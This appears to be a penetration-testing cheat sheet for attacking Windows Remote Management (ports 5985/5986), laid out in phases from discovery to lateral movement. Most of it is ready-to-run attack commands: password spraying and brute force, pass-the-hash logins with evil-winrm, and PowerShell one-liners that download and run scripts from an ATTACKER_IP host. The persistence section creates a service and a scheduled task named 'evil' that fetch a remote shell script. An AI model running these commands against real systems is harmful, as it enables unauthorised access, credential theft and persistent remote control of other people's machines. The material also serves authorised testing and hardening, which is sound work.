Veilcat

Latest

5985, 5986 WinRM

4 min read

Windows Remote Management

Environment Variables / Setup

export IP=
export DOMAIN=domain.local
export USER=username
export PASS=password

Phase 1: WinRM Service Discovery

Nmap WinRM Scripts

nmap -p 5985,5986 --script=winrm-info $IP

Service Detection

# Check WinRM service
nmap -p 5985,5986 $IP

# Check for HTTPS WinRM
nmap -p 5986 --script ssl-enum-ciphers $IP

# Banner grabbing
telnet $IP 5985

Phase 2: WinRM Enumeration

NetExec WinRM Enumeration

# Basic WinRM enumeration
netexec winrm $IP

# Test authentication
netexec winrm $IP -u '' -p ''
netexec winrm $IP -u 'guest' -p ''

# With credentials
netexec winrm $IP -u '$USER' -p '$PASS'

WinRM Configuration Check

# Check WinRM configuration (requires access)
winrm get winrm/config
winrm get winrm/config/listener

Phase 3: WinRM Authentication Testing

Password Spraying

# Using netexec
netexec winrm $IP -u users.txt -p 'Password123!' --continue-on-success

# Using evil-winrm with user list
for user in $(cat users.txt); do
    echo "Testing: $user"
    evil-winrm -i $IP -u $user -p 'Password123!' -e
done

Brute Force Attack

# Using hydra
hydra -L users.txt -P passwords.txt -t 1 -V $IP winrm

# Using netexec
netexec winrm $IP -u users.txt -p passwords.txt --continue-on-success

Phase 4: WinRM Connection Methods

Evil-WinRM Connection

# Username/Password authentication
evil-winrm -i $IP -u '$USER' -p '$PASS'

# Pass-the-Hash (PTH)
evil-winrm -i $IP -u '$USER' -H 'NTLM_HASH'

# Using domain authentication
evil-winrm -i $IP -u '$USER@$DOMAIN' -p '$PASS'

# Using SSL/HTTPS (port 5986)
evil-winrm -i $IP -u '$USER' -p '$PASS' -S

PowerShell Remoting

# From Windows attacking machine
$cred = Get-Credential
Enter-PSSession -ComputerName $IP -Credential $cred

# One-liner connection
$pass = ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('username', $pass)
Enter-PSSession -ComputerName $IP -Credential $cred

Phase 5: WinRM Post-Exploitation

Initial Enumeration

# System information
systeminfo
whoami /all
net user
net localgroup administrators

# Network information
ipconfig /all
netstat -an
arp -a

# Domain information (if domain joined)
nltest /domain_trusts
net group "Domain Admins" /domain

File Transfer via WinRM

# Upload files using evil-winrm
upload /local/path/file.exe C:\temp\file.exe

# Download files
download C:\temp\file.txt /local/path/file.txt

# PowerShell file transfer
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/script.ps1')

PowerShell Execution

# Execute PowerShell scripts
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/PowerUp.ps1')

# Load modules
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# Execute encoded commands
powershell -enc <base64_encoded_command>

Phase 6: WinRM Privilege Escalation

Service Enumeration

# Check services
Get-Service | Where-Object {$_.Status -eq "Running"}

# Service permissions
Get-Acl -Path "HKLM:\SYSTEM\CurrentControlSet\Services\*" | Format-Table

# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Registry Checks

# AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# AutoRuns
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Phase 7: WinRM Persistence

Service Creation

# Create malicious service
sc create evil binpath= "cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')"
sc start evil

Scheduled Task Creation

# Create scheduled task
schtasks /create /tn "evil" /tr "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')" /sc minute /mo 5

Phase 8: WinRM Lateral Movement

Remote Command Execution

# Execute commands on remote systems
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock {whoami}

# Execute scripts remotely
Invoke-Command -ComputerName TARGET -Credential $cred -FilePath C:\temp\script.ps1

Credential Harvesting

# Check for stored credentials
cmdkey /list

# PowerShell credential hunting
Get-ChildItem -Path C:\ -Include *password*,*cred* -Recurse -Force -ErrorAction SilentlyContinue

WinRM Configuration Hardening Checks

Security Settings

# Check WinRM configuration
winrm get winrm/config

# Authentication methods
winrm get winrm/config/service/auth

# Trusted hosts
winrm get winrm/config/client

Common Misconfigurations

  1. Basic authentication enabled
  2. Unencrypted traffic allowed
  3. Weak authentication requirements
  4. Overly permissive trusted hosts
  5. Default credentials not changed

WinRM Attack Checklist

  • Service discovery and version identification
  • Authentication testing (anonymous, guest)
  • Password spraying with common passwords
  • Brute force attacks (if other methods fail)
  • Connection establishment via various methods
  • Initial enumeration of target system
  • Privilege escalation vector identification
  • Persistence establishment
  • Lateral movement opportunities

Tools Summary

# Enumeration
nmap, netexec

# Connection & Exploitation
evil-winrm, PowerShell remoting

# Post-exploitation
PowerUp.ps1, WinPEAS, Mimikatz

Common WinRM Ports

5985/tcp  - WinRM HTTP
5986/tcp  - WinRM HTTPS

Next Steps

Once WinRM access is gained:

  1. Enumerate system for privilege escalation
  2. Harvest credentials from memory/files
  3. Establish persistence mechanisms
  4. Map network for lateral movement
  5. Escalate privileges to SYSTEM/Administrator

Resources

Graph View

Backlinks